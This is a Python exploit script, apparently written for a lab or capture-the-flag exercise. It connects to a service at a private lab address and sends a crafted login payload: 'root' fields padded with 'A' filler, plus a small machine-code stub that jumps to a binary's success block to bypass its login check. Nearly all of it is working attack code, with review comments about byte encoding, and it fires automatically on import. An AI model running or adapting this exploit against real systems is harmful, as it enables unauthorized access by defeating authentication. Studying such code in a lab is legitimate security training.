#!/usr/bin/env python3
import socket
from core.colors import *
# Target. The second address is the other lab host this was tried against.
IP = '192.168.188.135'   # alternate lab host: 192.168.188.131
PORT = 8888

# Logic:
#   0x08048B53 is the address of the SUCCESS message block.
#   Replace the comparison at 0x08048b51 (<+372>: JE 0x8048b5a <main+381>)
#   with "push 0x08048B53 ; ret" so execution lands on the success path.
comparison_addr = 0x08048B51  # 0x08048b51 <+372>: JE 0x8048b5a <main+381>

# Stub that diverts control to the success block.
# NOTE(review): this is a str, not bytes. The values >= 0x80 (\x8B, \xC3)
# only reach the wire intact when encoded with latin-1; str.encode() with
# its default UTF-8 expands each of them to two bytes and breaks the stub.
shellcode = (
    "\x68\x53\x8B\x04\x08"  # push 0x8048b53
    "\xC3"                  # ret
)
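# Open the connection to the target at import time (the rest of the script
# relies on the module-level socket ``s``). The socket is created outside
# the try so a failed connect() can still close it; any OSError (refused,
# unreachable, resolution failure, timeout) is reported and the script
# exits with a non-zero status instead of continuing without a connection.
print(f"{run} Trying to connect to {underline}{IP}{end} at port {underline}{PORT}{end}...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((IP, PORT))
except OSError as e:
    # Release the descriptor before bailing out. The builtin exit() is
    # supplied by the site module and not guaranteed to exist; SystemExit
    # is the portable way to stop, and 1 signals failure to the caller.
    s.close()
    print(f"{bad} Error in connecting to {underline}{IP}{end} at port {underline}{PORT}{end}... Try Again")
    print(e)
    raise SystemExit(1)
print(f"{good} Connection Established!")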
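# Payload fragments. Both are str objects standing in for raw byte values,
# so they must be sent through latin-1 (one code point -> one byte); the
# default UTF-8 encoding would turn each of \xff\xff\xff\xfc into two bytes.
# negative_chunk is kept for experimentation; exploit() does not use it.
negative_chunk = '0' + '\xff\xff\xff\xfc'
username_prefixes = '0'


def exploit(sock=None):
    """Send the crafted login message and print the target's reply.

    The message is the line ``A``, then a ``0root\\0`` field, 43 bytes of
    0x41 filler, the same field and filler again, and finally ``0toor`` —
    the exact byte sequence the original script sent.

    Args:
        sock: a connected stream socket. Defaults to the module-level ``s``
            opened at import time; passing one explicitly lets the function
            run without the global connection.

    Returns:
        The reply decoded as UTF-8 (undecodable bytes replaced), so callers
        can inspect it. The original returned None; printing is unchanged.
    """
    if sock is None:
        sock = s  # global connection opened at import time

    field = username_prefixes + 'root' + '\x00'
    filler = '\x41' * 43
    msg = ''.join(('A', '\x0a', field, filler, field, filler, username_prefixes + 'toor'))

    # latin-1 maps every code point < 256 to the identical byte, which is
    # what a hand-built binary payload needs (plain .encode() is UTF-8 and
    # would corrupt any value >= 0x80). sendall() covers short writes.
    sock.sendall(msg.encode('latin-1'))

    # The reply is untrusted binary: decode with 'replace' so a non-UTF-8
    # response cannot kill the script with UnicodeDecodeError. Note the
    # reply is still printed raw; a hostile server could emit terminal
    # escape sequences.
    data = sock.recv(1024).decode('utf-8', errors='replace')
    print("Client Says: " + msg)
    print("Server Reply: " + data)
    return data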
# Fires at import time, immediately after the connection above; there is no
# __main__ guard, so importing this module sends the payload to IP:PORT.
exploit()